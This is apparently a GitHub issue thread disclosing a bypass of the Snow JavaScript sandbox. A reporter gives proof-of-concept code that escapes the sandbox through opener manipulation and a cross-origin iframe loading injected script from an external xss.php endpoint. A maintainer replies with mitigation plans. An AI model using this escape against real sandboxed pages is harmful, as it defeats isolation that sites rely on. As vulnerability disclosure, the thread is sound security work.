Snow can be bypassed with opener.alert()

[terjanq]

It is possible to enable access to opener in various ways, e.g. opening two popups and using opener attribute on snow to perform the following:

// from: snow.playground
opener.location = 'about:blank';
// short sleep
opener.alert()

The above attack could be mitigated by banning opener property from the window object, however, it's possible to use an opener on a cross-origin iframe. The following PoC achieves just that with some other trickery to establish openee-opener relationship. Seems to be working in both Chrome and Firefox.

(async ()=>{
    const sleep = d => new Promise(r=>setTimeout(r,d));
    var x = document.createElement('iframe');
    x.name = '_bypass';
    x.src = `https://terjanq.me/xss.php?js=open('https://terjanq.me/xss.php?js=open("", "_bypass")')`;
    document.body.appendChild(x);
    await sleep(1000);
    _bypass.opener.location = 'about:blank';
    await sleep(500);
    const alert = _bypass.opener.alert;
    _bypass.opener.close();
    await sleep(100);
    alert.call(window, origin);
})();

[naugtur]

Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this. The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.